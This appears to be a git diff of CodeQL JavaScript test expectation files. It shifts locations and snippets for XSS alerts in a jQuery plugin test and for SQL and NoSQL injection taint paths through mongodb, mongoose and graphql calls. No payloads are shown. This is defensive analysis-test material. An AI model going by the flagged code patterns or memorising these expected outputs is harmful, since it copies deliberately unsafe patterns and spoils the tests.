| options | unsafe-jquery-plugin.js:117:5:117:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:114:19:118:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:122:5:122:18 | options.target | unsafe-jquery-plugin.js:121:40:121:46 | options | unsafe-jquery-plugin.js:122:5:122:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:121:21:123:2 | functio ... 
T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:127:6:127:19 | options.target | unsafe-jquery-plugin.js:126:33:126:39 | options | unsafe-jquery-plugin.js:127:6:127:19 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:126:14:128:3 | functio ... OK\\n\\t\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:132:5:132:18 | options.target | unsafe-jquery-plugin.js:131:34:131:40 | options | unsafe-jquery-plugin.js:132:5:132:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:131:15:133:2 | functio ... T OK\\n\\t} | '$.fn.affix' plugin | -| unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | unsafe-jquery-plugin.js:135:36:135:42 | options | unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:135:17:137:2 | functio ... T OK\\n\\t} | '$.fn.tooltip' plugin | -| unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | unsafe-jquery-plugin.js:153:38:153:44 | options | unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:153:19:158:2 | functio ... NCY]\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:107:5:107:18 | options.target | unsafe-jquery-plugin.js:101:38:101:44 | options | unsafe-jquery-plugin.js:107:5:107:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:101:19:108:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:117:5:117:18 | options.target | unsafe-jquery-plugin.js:114:38:114:44 | options | unsafe-jquery-plugin.js:117:5:117:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:114:19:118:2 | functio ... 
lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:122:5:122:18 | options.target | unsafe-jquery-plugin.js:121:40:121:46 | options | unsafe-jquery-plugin.js:122:5:122:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:121:21:123:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:127:6:127:19 | options.target | unsafe-jquery-plugin.js:126:33:126:39 | options | unsafe-jquery-plugin.js:127:6:127:19 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:126:14:128:3 | functio ... ert\\n\\t\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:132:5:132:18 | options.target | unsafe-jquery-plugin.js:131:34:131:40 | options | unsafe-jquery-plugin.js:132:5:132:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:131:15:133:2 | functio ... lert\\n\\t} | '$.fn.affix' plugin | +| unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | unsafe-jquery-plugin.js:135:36:135:42 | options | unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:135:17:137:2 | functio ... lert\\n\\t} | '$.fn.tooltip' plugin | +| unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | unsafe-jquery-plugin.js:153:38:153:44 | options | unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:153:19:158:2 | functio ... ties\\n\\t} | '$.fn.my_plugin' plugin | | unsafe-jquery-plugin.js:170:6:170:11 | target | unsafe-jquery-plugin.js:160:38:160:44 | options | unsafe-jquery-plugin.js:170:6:170:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:160:19:173:2 | functio ... 
\\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:179:5:179:18 | options.target | unsafe-jquery-plugin.js:178:27:178:33 | options | unsafe-jquery-plugin.js:179:5:179:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:178:18:180:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:179:5:179:18 | options.target | unsafe-jquery-plugin.js:178:27:178:33 | options | unsafe-jquery-plugin.js:179:5:179:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:178:18:180:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | | unsafe-jquery-plugin.js:192:19:192:28 | options.of | unsafe-jquery-plugin.js:185:28:185:34 | options | unsafe-jquery-plugin.js:192:19:192:28 | options.of | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:185:18:194:2 | functio ... et);\\n\\t} | '$.fn.position' plugin | diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected b/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected index 0f95e5464fb9..52ce3076ba70 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected @@ -1,4 +1,4 @@ -| html-sanitizer.js:15:5:17:5 | connect ... K\\n ) | +| html-sanitizer.js:15:5:17:5 | connect ... t\\n ) | | json-schema-validator.js:27:13:27:27 | doc.find(query) | | json-schema-validator.js:30:13:30:27 | doc.find(query) | | json-schema-validator.js:33:13:33:27 | doc.find(query) | 
@@ -7,43 +7,43 @@ | json-schema-validator.js:55:13:55:27 | doc.find(query) | | json-schema-validator.js:59:13:59:27 | doc.find(query) | | json-schema-validator.js:61:13:61:27 | doc.find(query) | -| marsdb-flow-to.js:14:3:14:41 | db.myDo ... => {}) | -| marsdb.js:16:3:16:36 | doc.fin ... => {}) | -| minimongo.js:18:3:18:17 | doc.find(query) | -| mongodb.js:18:7:18:21 | doc.find(query) | -| mongodb.js:21:7:21:48 | doc.fin ... itle }) | -| mongodb.js:24:7:24:53 | doc.fin ... r(1) }) | -| mongodb.js:29:9:29:34 | doc.fin ... itle }) | -| mongodb.js:32:9:32:46 | doc.fin ... tle) }) | -| mongodb.js:43:7:43:21 | doc.find(query) | -| mongodb.js:54:7:54:21 | doc.find(query) | -| mongodb.js:65:3:65:17 | doc.find(query) | -| mongodb.js:73:5:77:27 | client\\n ... tag }) | -| mongodb.js:81:3:85:25 | importe ... tag }) | -| mongodb.js:98:5:98:19 | doc.find(query) | -| mongodb.js:112:5:112:19 | doc.find(query) | +| marsdb-flow-to.js:13:3:13:41 | db.myDo ... => {}) | +| marsdb.js:15:3:15:36 | doc.fin ... => {}) | +| minimongo.js:17:3:17:17 | doc.find(query) | +| mongodb.js:17:7:17:21 | doc.find(query) | +| mongodb.js:20:7:20:48 | doc.fin ... itle }) | +| mongodb.js:23:7:23:53 | doc.fin ... r(1) }) | +| mongodb.js:28:9:28:34 | doc.fin ... itle }) | +| mongodb.js:30:9:30:46 | doc.fin ... tle) }) | +| mongodb.js:41:7:41:21 | doc.find(query) | +| mongodb.js:51:7:51:21 | doc.find(query) | +| mongodb.js:61:3:61:17 | doc.find(query) | +| mongodb.js:69:5:72:27 | client\\n ... tag }) | +| mongodb.js:76:3:79:25 | importe ... tag }) | +| mongodb.js:92:5:92:19 | doc.find(query) | +| mongodb.js:105:5:105:19 | doc.find(query) | | mongodb_bodySafe.js:18:7:18:21 | doc.find(query) | -| mongodb_bodySafe.js:29:7:29:21 | doc.find(query) | -| mongoose.js:63:2:63:34 | Documen ... then(X) | -| mongoose.js:65:2:65:51 | Documen ... on(){}) | -| mongoose.js:67:2:68:27 | new Mon ... on(){}) | -| mongoose.js:71:2:78:9 | Documen ... .exec() | -| mongoose.js:85:2:85:52 | Documen ... 
query)) | -| mongoose.js:86:2:86:52 | Documen ... query)) | -| mongoose.js:87:2:87:57 | Documen ... query)) | -| mongoose.js:88:2:88:57 | Documen ... query)) | -| mongoose.js:89:2:89:52 | Documen ... query)) | -| mongoose.js:90:2:90:55 | Documen ... query)) | -| mongoose.js:92:2:92:52 | Documen ... query)) | -| mongoose.js:93:2:93:49 | Documen ... query)) | -| mongoose.js:94:2:94:57 | Documen ... query)) | -| mongoose.js:95:2:95:54 | Documen ... query)) | -| mongoose.js:96:2:96:52 | Documen ... query)) | -| mongoose.js:97:2:97:52 | Documen ... query)) | -| mongoose.js:99:2:99:50 | Documen ... query)) | -| mongoose.js:113:2:113:53 | Documen ... () { }) | -| mongoose.js:134:3:134:52 | Documen ... on(){}) | -| mongoose.js:136:3:136:52 | Documen ... on(){}) | +| mongodb_bodySafe.js:28:7:28:21 | doc.find(query) | +| mongoose.js:49:2:49:34 | Documen ... then(X) | +| mongoose.js:51:2:51:51 | Documen ... on(){}) | +| mongoose.js:53:2:54:27 | new Mon ... on(){}) | +| mongoose.js:57:2:64:9 | Documen ... .exec() | +| mongoose.js:71:2:71:52 | Documen ... query)) | +| mongoose.js:72:2:72:52 | Documen ... query)) | +| mongoose.js:73:2:73:57 | Documen ... query)) | +| mongoose.js:74:2:74:57 | Documen ... query)) | +| mongoose.js:75:2:75:52 | Documen ... query)) | +| mongoose.js:76:2:76:55 | Documen ... query)) | +| mongoose.js:78:2:78:52 | Documen ... query)) | +| mongoose.js:79:2:79:49 | Documen ... query)) | +| mongoose.js:80:2:80:57 | Documen ... query)) | +| mongoose.js:81:2:81:54 | Documen ... query)) | +| mongoose.js:82:2:82:52 | Documen ... query)) | +| mongoose.js:83:2:83:52 | Documen ... query)) | +| mongoose.js:85:2:85:50 | Documen ... query)) | +| mongoose.js:99:2:99:53 | Documen ... () { }) | +| mongoose.js:120:3:120:52 | Documen ... on(){}) | +| mongoose.js:122:3:122:52 | Documen ... on(){}) | | mysql.js:8:9:11:47 | connect ... ds) {}) | | mysql.js:14:9:16:47 | connect ... ds) {}) | | mysql.js:19:9:20:48 | connect ... ds) {}) | 
@@ -59,10 +59,10 @@ | pg-promise.js:17:3:17:21 | db.oneOrNone(query) | | pg-promise.js:18:3:18:17 | db.query(query) | | pg-promise.js:19:3:19:18 | db.result(query) | -| pg-promise.js:21:3:23:4 | db.one( ... OK\\n }) | -| pg-promise.js:24:3:27:4 | db.one( ... OK\\n }) | +| pg-promise.js:21:3:23:4 | db.one( ... rt\\n }) | +| pg-promise.js:24:3:27:4 | db.one( ... d,\\n }) | | pg-promise.js:28:3:31:4 | db.one( ... er\\n }) | -| pg-promise.js:32:3:35:4 | db.one( ... OK\\n }) | +| pg-promise.js:32:3:35:4 | db.one( ... rt\\n }) | | pg-promise.js:36:3:43:4 | db.one( ... ]\\n }) | | pg-promise.js:44:3:50:4 | db.one( ... }\\n }) | | pg-promise.js:51:3:58:4 | db.one( ... }\\n }) | @@ -88,7 +88,7 @@ | redis.js:49:18:49:47 | client. ... value") | | socketio.js:11:5:11:54 | db.run( ... ndle}`) | | tst2.js:7:3:7:62 | sql.que ... ms.id}` | -| tst2.js:9:3:9:85 | new sql ... + "'") | +| tst2.js:8:3:8:85 | new sql ... + "'") | | tst3.js:9:3:11:4 | pool.qu ... ts\\n }) | | tst3.js:16:3:18:4 | pool.qu ... ts\\n }) | | tst4.js:8:3:8:67 | db.get( ... + '"') | diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected b/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected index 5ae279288cf8..e19e6731ee75 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected 
@@ -1,38 +1,38 @@ nodes | graphql.js:8:11:8:28 | id | semmle.label | id | | graphql.js:8:16:8:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:10:34:20:5 | `\\n ... }\\n ` | semmle.label | `\\n ... }\\n ` | -| graphql.js:12:46:12:47 | id | semmle.label | id | -| graphql.js:26:11:26:28 | id | semmle.label | id | -| graphql.js:26:16:26:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:27:30:27:40 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:27:37:27:38 | id | semmle.label | id | -| graphql.js:30:32:30:42 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:30:39:30:40 | id | semmle.label | id | -| graphql.js:33:18:33:28 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:33:25:33:26 | id | semmle.label | id | -| graphql.js:39:11:39:28 | id | semmle.label | id | -| graphql.js:39:16:39:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:44:14:44:24 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:44:21:44:22 | id | semmle.label | id | -| graphql.js:48:44:48:54 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:48:51:48:52 | id | semmle.label | id | -| graphql.js:55:11:55:28 | id | semmle.label | id | -| graphql.js:55:16:55:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:56:39:56:49 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:56:46:56:47 | id | semmle.label | id | -| graphql.js:58:66:58:76 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:58:73:58:74 | id | semmle.label | id | -| graphql.js:74:9:74:25 | id | semmle.label | id | -| graphql.js:74:14:74:25 | req.query.id | semmle.label | req.query.id | -| graphql.js:75:46:75:64 | "{ foo" + id + " }" | semmle.label | "{ foo" + id + " }" | -| graphql.js:75:56:75:57 | id | semmle.label | id | -| graphql.js:84:14:90:8 | `{\\n ... }` | semmle.label | `{\\n ... 
}` | -| graphql.js:88:13:88:14 | id | semmle.label | id | -| graphql.js:119:11:119:28 | id | semmle.label | id | -| graphql.js:119:16:119:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:120:38:120:48 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:120:45:120:46 | id | semmle.label | id | +| graphql.js:9:34:19:5 | ` // $ ... }\\n ` | semmle.label | ` // $ ... }\\n ` | +| graphql.js:11:46:11:47 | id | semmle.label | id | +| graphql.js:25:11:25:28 | id | semmle.label | id | +| graphql.js:25:16:25:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:26:30:26:40 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:26:37:26:38 | id | semmle.label | id | +| graphql.js:29:32:29:42 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:29:39:29:40 | id | semmle.label | id | +| graphql.js:32:18:32:28 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:32:25:32:26 | id | semmle.label | id | +| graphql.js:38:11:38:28 | id | semmle.label | id | +| graphql.js:38:16:38:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:43:14:43:24 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:43:21:43:22 | id | semmle.label | id | +| graphql.js:47:44:47:54 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:47:51:47:52 | id | semmle.label | id | +| graphql.js:54:11:54:28 | id | semmle.label | id | +| graphql.js:54:16:54:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:55:39:55:49 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:55:46:55:47 | id | semmle.label | id | +| graphql.js:57:66:57:76 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:57:73:57:74 | id | semmle.label | id | +| graphql.js:73:9:73:25 | id | semmle.label | id | +| graphql.js:73:14:73:25 | req.query.id | semmle.label | req.query.id | +| graphql.js:74:46:74:64 | "{ foo" + id + " }" | semmle.label | "{ foo" + id + " }" | +| graphql.js:74:56:74:57 | id | semmle.label | id | +| graphql.js:82:14:88:8 | `{ 
// $ ... }` | semmle.label | `{ // $ ... }` | +| graphql.js:86:13:86:14 | id | semmle.label | id | +| graphql.js:117:11:117:28 | id | semmle.label | id | +| graphql.js:117:16:117:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:118:38:118:48 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:118:45:118:46 | id | semmle.label | id | | html-sanitizer.js:13:39:13:44 | param1 | semmle.label | param1 | | html-sanitizer.js:14:5:14:24 | param1 | semmle.label | param1 | | html-sanitizer.js:14:14:14:24 | xss(param1) | semmle.label | xss(param1) | 
@@ -84,125 +84,125 @@ nodes | marsdb-flow-to.js:10:17:10:18 | {} | semmle.label | {} | | marsdb-flow-to.js:11:17:11:24 | req.body | semmle.label | req.body | | marsdb-flow-to.js:11:17:11:30 | req.body.title | semmle.label | req.body.title | -| marsdb-flow-to.js:14:17:14:21 | query | semmle.label | query | +| marsdb-flow-to.js:13:17:13:21 | query | semmle.label | query | | marsdb.js:12:9:12:18 | query | semmle.label | query | | marsdb.js:12:17:12:18 | {} | semmle.label | {} | | marsdb.js:13:17:13:24 | req.body | semmle.label | req.body | | marsdb.js:13:17:13:30 | req.body.title | semmle.label | req.body.title | -| marsdb.js:16:12:16:16 | query | semmle.label | query | +| marsdb.js:15:12:15:16 | query | semmle.label | query | | minimongo.js:14:9:14:18 | query | semmle.label | query | | minimongo.js:14:17:14:18 | {} | semmle.label | {} | | minimongo.js:15:17:15:24 | req.body | semmle.label | req.body | | minimongo.js:15:17:15:30 | req.body.title | semmle.label | req.body.title | -| minimongo.js:18:12:18:16 | query | semmle.label | query | +| minimongo.js:17:12:17:16 | query | semmle.label | query | | mongodb.js:12:11:12:20 | query | semmle.label | query | | mongodb.js:12:19:12:20 | {} | semmle.label | {} | | mongodb.js:13:5:13:9 | query | semmle.label | query | | mongodb.js:13:19:13:26 | req.body | semmle.label | req.body | | mongodb.js:13:19:13:32 | req.body.title | semmle.label | req.body.title | -| mongodb.js:18:16:18:20 | query | semmle.label | query | -| mongodb.js:26:11:26:32 | title | semmle.label | title | -| mongodb.js:26:19:26:26 | req.body | semmle.label | req.body | -| mongodb.js:26:19:26:32 | req.body.title | semmle.label | req.body.title | -| mongodb.js:32:18:32:45 | { title ... itle) } | semmle.label | { title ... 
itle) } | -| mongodb.js:32:27:32:43 | JSON.parse(title) | semmle.label | JSON.parse(title) | -| mongodb.js:32:38:32:42 | title | semmle.label | title | -| mongodb.js:48:11:48:20 | query | semmle.label | query | -| mongodb.js:48:19:48:20 | {} | semmle.label | {} | -| mongodb.js:49:5:49:9 | query | semmle.label | query | -| mongodb.js:49:19:49:33 | req.query.title | semmle.label | req.query.title | -| mongodb.js:54:16:54:20 | query | semmle.label | query | -| mongodb.js:59:8:59:17 | query | semmle.label | query | -| mongodb.js:59:16:59:17 | {} | semmle.label | {} | -| mongodb.js:60:2:60:6 | query | semmle.label | query | -| mongodb.js:60:16:60:30 | req.query.title | semmle.label | req.query.title | -| mongodb.js:65:12:65:16 | query | semmle.label | query | -| mongodb.js:70:7:70:25 | tag | semmle.label | tag | -| mongodb.js:70:13:70:25 | req.query.tag | semmle.label | req.query.tag | -| mongodb.js:77:14:77:26 | { tags: tag } | semmle.label | { tags: tag } | -| mongodb.js:77:22:77:24 | tag | semmle.label | tag | -| mongodb.js:85:12:85:24 | { tags: tag } | semmle.label | { tags: tag } | -| mongodb.js:85:20:85:22 | tag | semmle.label | tag | -| mongodb.js:106:9:106:18 | query | semmle.label | query | -| mongodb.js:106:17:106:18 | {} | semmle.label | {} | -| mongodb.js:107:3:107:7 | query | semmle.label | query | -| mongodb.js:107:17:107:29 | queries.title | semmle.label | queries.title | -| mongodb.js:112:14:112:18 | query | semmle.label | query | +| mongodb.js:17:16:17:20 | query | semmle.label | query | +| mongodb.js:25:11:25:32 | title | semmle.label | title | +| mongodb.js:25:19:25:26 | req.body | semmle.label | req.body | +| mongodb.js:25:19:25:32 | req.body.title | semmle.label | req.body.title | +| mongodb.js:30:18:30:45 | { title ... itle) } | semmle.label | { title ... 
itle) } | +| mongodb.js:30:27:30:43 | JSON.parse(title) | semmle.label | JSON.parse(title) | +| mongodb.js:30:38:30:42 | title | semmle.label | title | +| mongodb.js:46:11:46:20 | query | semmle.label | query | +| mongodb.js:46:19:46:20 | {} | semmle.label | {} | +| mongodb.js:47:5:47:9 | query | semmle.label | query | +| mongodb.js:47:19:47:33 | req.query.title | semmle.label | req.query.title | +| mongodb.js:51:16:51:20 | query | semmle.label | query | +| mongodb.js:56:8:56:17 | query | semmle.label | query | +| mongodb.js:56:16:56:17 | {} | semmle.label | {} | +| mongodb.js:57:2:57:6 | query | semmle.label | query | +| mongodb.js:57:16:57:30 | req.query.title | semmle.label | req.query.title | +| mongodb.js:61:12:61:16 | query | semmle.label | query | +| mongodb.js:66:7:66:25 | tag | semmle.label | tag | +| mongodb.js:66:13:66:25 | req.query.tag | semmle.label | req.query.tag | +| mongodb.js:72:14:72:26 | { tags: tag } | semmle.label | { tags: tag } | +| mongodb.js:72:22:72:24 | tag | semmle.label | tag | +| mongodb.js:79:12:79:24 | { tags: tag } | semmle.label | { tags: tag } | +| mongodb.js:79:20:79:22 | tag | semmle.label | tag | +| mongodb.js:100:9:100:18 | query | semmle.label | query | +| mongodb.js:100:17:100:18 | {} | semmle.label | {} | +| mongodb.js:101:3:101:7 | query | semmle.label | query | +| mongodb.js:101:17:101:29 | queries.title | semmle.label | queries.title | +| mongodb.js:105:14:105:18 | query | semmle.label | query | | mongodb_bodySafe.js:23:11:23:20 | query | semmle.label | query | | mongodb_bodySafe.js:23:19:23:20 | {} | semmle.label | {} | | mongodb_bodySafe.js:24:5:24:9 | query | semmle.label | query | | mongodb_bodySafe.js:24:19:24:33 | req.query.title | semmle.label | req.query.title | -| mongodb_bodySafe.js:29:16:29:20 | query | semmle.label | query | +| mongodb_bodySafe.js:28:16:28:20 | query | semmle.label | query | | mongoose.js:20:8:20:17 | query | semmle.label | query | | mongoose.js:20:16:20:17 | {} | semmle.label | {} | | 
mongoose.js:21:2:21:6 | query | semmle.label | query | | mongoose.js:21:16:21:23 | req.body | semmle.label | req.body | | mongoose.js:21:16:21:29 | req.body.title | semmle.label | req.body.title | -| mongoose.js:24:21:24:27 | [query] | semmle.label | [query] | -| mongoose.js:24:22:24:26 | query | semmle.label | query | -| mongoose.js:27:17:27:21 | query | semmle.label | query | -| mongoose.js:30:22:30:26 | query | semmle.label | query | -| mongoose.js:33:21:33:25 | query | semmle.label | query | -| mongoose.js:36:28:36:32 | query | semmle.label | query | -| mongoose.js:39:16:39:20 | query | semmle.label | query | -| mongoose.js:42:19:42:23 | query | semmle.label | query | -| mongoose.js:45:28:45:32 | query | semmle.label | query | -| mongoose.js:48:28:48:32 | query | semmle.label | query | -| mongoose.js:51:28:51:32 | query | semmle.label | query | -| mongoose.js:54:22:54:26 | query | semmle.label | query | -| mongoose.js:57:18:57:22 | query | semmle.label | query | -| mongoose.js:60:22:60:26 | query | semmle.label | query | -| mongoose.js:63:21:63:25 | query | semmle.label | query | -| mongoose.js:65:32:65:36 | query | semmle.label | query | -| mongoose.js:67:27:67:31 | query | semmle.label | query | -| mongoose.js:68:8:68:12 | query | semmle.label | query | -| mongoose.js:71:17:71:21 | query | semmle.label | query | -| mongoose.js:72:10:72:14 | query | semmle.label | query | -| mongoose.js:73:8:73:12 | query | semmle.label | query | -| mongoose.js:74:7:74:11 | query | semmle.label | query | -| mongoose.js:75:16:75:20 | query | semmle.label | query | -| mongoose.js:76:12:76:16 | query | semmle.label | query | -| mongoose.js:77:10:77:14 | query | semmle.label | query | -| mongoose.js:81:37:81:41 | query | semmle.label | query | +| mongoose.js:23:21:23:27 | [query] | semmle.label | [query] | +| mongoose.js:23:22:23:26 | query | semmle.label | query | +| mongoose.js:25:17:25:21 | query | semmle.label | query | +| mongoose.js:27:22:27:26 | query | semmle.label | query 
| +| mongoose.js:29:21:29:25 | query | semmle.label | query | +| mongoose.js:31:28:31:32 | query | semmle.label | query | +| mongoose.js:33:16:33:20 | query | semmle.label | query | +| mongoose.js:35:19:35:23 | query | semmle.label | query | +| mongoose.js:37:28:37:32 | query | semmle.label | query | +| mongoose.js:39:28:39:32 | query | semmle.label | query | +| mongoose.js:41:28:41:32 | query | semmle.label | query | +| mongoose.js:43:22:43:26 | query | semmle.label | query | +| mongoose.js:45:18:45:22 | query | semmle.label | query | +| mongoose.js:47:22:47:26 | query | semmle.label | query | +| mongoose.js:49:21:49:25 | query | semmle.label | query | +| mongoose.js:51:32:51:36 | query | semmle.label | query | +| mongoose.js:53:27:53:31 | query | semmle.label | query | +| mongoose.js:54:8:54:12 | query | semmle.label | query | +| mongoose.js:57:17:57:21 | query | semmle.label | query | +| mongoose.js:58:10:58:14 | query | semmle.label | query | +| mongoose.js:59:8:59:12 | query | semmle.label | query | +| mongoose.js:60:7:60:11 | query | semmle.label | query | +| mongoose.js:61:16:61:20 | query | semmle.label | query | +| mongoose.js:62:12:62:16 | query | semmle.label | query | +| mongoose.js:63:10:63:14 | query | semmle.label | query | +| mongoose.js:67:37:67:41 | query | semmle.label | query | +| mongoose.js:68:46:68:50 | query | semmle.label | query | +| mongoose.js:69:47:69:51 | query | semmle.label | query | +| mongoose.js:71:46:71:50 | query | semmle.label | query | +| mongoose.js:73:51:73:55 | query | semmle.label | query | +| mongoose.js:75:46:75:50 | query | semmle.label | query | +| mongoose.js:78:46:78:50 | query | semmle.label | query | +| mongoose.js:80:51:80:55 | query | semmle.label | query | | mongoose.js:82:46:82:50 | query | semmle.label | query | -| mongoose.js:83:47:83:51 | query | semmle.label | query | -| mongoose.js:85:46:85:50 | query | semmle.label | query | -| mongoose.js:87:51:87:55 | query | semmle.label | query | -| 
mongoose.js:89:46:89:50 | query | semmle.label | query | -| mongoose.js:92:46:92:50 | query | semmle.label | query | -| mongoose.js:94:51:94:55 | query | semmle.label | query | -| mongoose.js:96:46:96:50 | query | semmle.label | query | -| mongoose.js:104:21:104:25 | query | semmle.label | query | -| mongoose.js:111:14:111:18 | query | semmle.label | query | -| mongoose.js:113:31:113:35 | query | semmle.label | query | -| mongoose.js:115:6:115:22 | id | semmle.label | id | -| mongoose.js:115:11:115:22 | req.query.id | semmle.label | req.query.id | -| mongoose.js:115:25:115:45 | cond | semmle.label | cond | -| mongoose.js:115:32:115:45 | req.query.cond | semmle.label | req.query.cond | -| mongoose.js:116:22:116:25 | cond | semmle.label | cond | -| mongoose.js:117:21:117:24 | cond | semmle.label | cond | -| mongoose.js:118:21:118:24 | cond | semmle.label | cond | -| mongoose.js:119:18:119:21 | cond | semmle.label | cond | -| mongoose.js:120:22:120:25 | cond | semmle.label | cond | -| mongoose.js:121:16:121:19 | cond | semmle.label | cond | -| mongoose.js:122:19:122:22 | cond | semmle.label | cond | -| mongoose.js:123:20:123:21 | id | semmle.label | id | -| mongoose.js:124:28:124:31 | cond | semmle.label | cond | -| mongoose.js:125:28:125:31 | cond | semmle.label | cond | -| mongoose.js:126:28:126:31 | cond | semmle.label | cond | -| mongoose.js:127:18:127:21 | cond | semmle.label | cond | -| mongoose.js:128:22:128:25 | cond | semmle.label | cond | -| mongoose.js:129:21:129:24 | cond | semmle.label | cond | -| mongoose.js:130:16:130:26 | { _id: id } | semmle.label | { _id: id } | -| mongoose.js:130:23:130:24 | id | semmle.label | id | -| mongoose.js:133:38:133:42 | query | semmle.label | query | -| mongoose.js:136:30:136:34 | query | semmle.label | query | +| mongoose.js:90:21:90:25 | query | semmle.label | query | +| mongoose.js:97:14:97:18 | query | semmle.label | query | +| mongoose.js:99:31:99:35 | query | semmle.label | query | +| mongoose.js:101:6:101:22 | id | 
semmle.label | id | +| mongoose.js:101:11:101:22 | req.query.id | semmle.label | req.query.id | +| mongoose.js:101:25:101:45 | cond | semmle.label | cond | +| mongoose.js:101:32:101:45 | req.query.cond | semmle.label | req.query.cond | +| mongoose.js:102:22:102:25 | cond | semmle.label | cond | +| mongoose.js:103:21:103:24 | cond | semmle.label | cond | +| mongoose.js:104:21:104:24 | cond | semmle.label | cond | +| mongoose.js:105:18:105:21 | cond | semmle.label | cond | +| mongoose.js:106:22:106:25 | cond | semmle.label | cond | +| mongoose.js:107:16:107:19 | cond | semmle.label | cond | +| mongoose.js:108:19:108:22 | cond | semmle.label | cond | +| mongoose.js:109:20:109:21 | id | semmle.label | id | +| mongoose.js:110:28:110:31 | cond | semmle.label | cond | +| mongoose.js:111:28:111:31 | cond | semmle.label | cond | +| mongoose.js:112:28:112:31 | cond | semmle.label | cond | +| mongoose.js:113:18:113:21 | cond | semmle.label | cond | +| mongoose.js:114:22:114:25 | cond | semmle.label | cond | +| mongoose.js:115:21:115:24 | cond | semmle.label | cond | +| mongoose.js:116:16:116:26 | { _id: id } | semmle.label | { _id: id } | +| mongoose.js:116:23:116:24 | id | semmle.label | id | +| mongoose.js:119:38:119:42 | query | semmle.label | query | +| mongoose.js:122:30:122:34 | query | semmle.label | query | | mongooseJsonParse.js:19:11:19:20 | query | semmle.label | query | | mongooseJsonParse.js:19:19:19:20 | {} | semmle.label | {} | | mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | semmle.label | JSON.pa ... y.data) | | mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | semmle.label | JSON.pa ... ).title | | mongooseJsonParse.js:20:30:20:43 | req.query.data | semmle.label | req.query.data | -| mongooseJsonParse.js:23:19:23:23 | query | semmle.label | query | +| mongooseJsonParse.js:22:19:22:23 | query | semmle.label | query | | mongooseModelClient.js:10:7:10:32 | v | semmle.label | v | | mongooseModelClient.js:10:11:10:32 | JSON.pa ... 
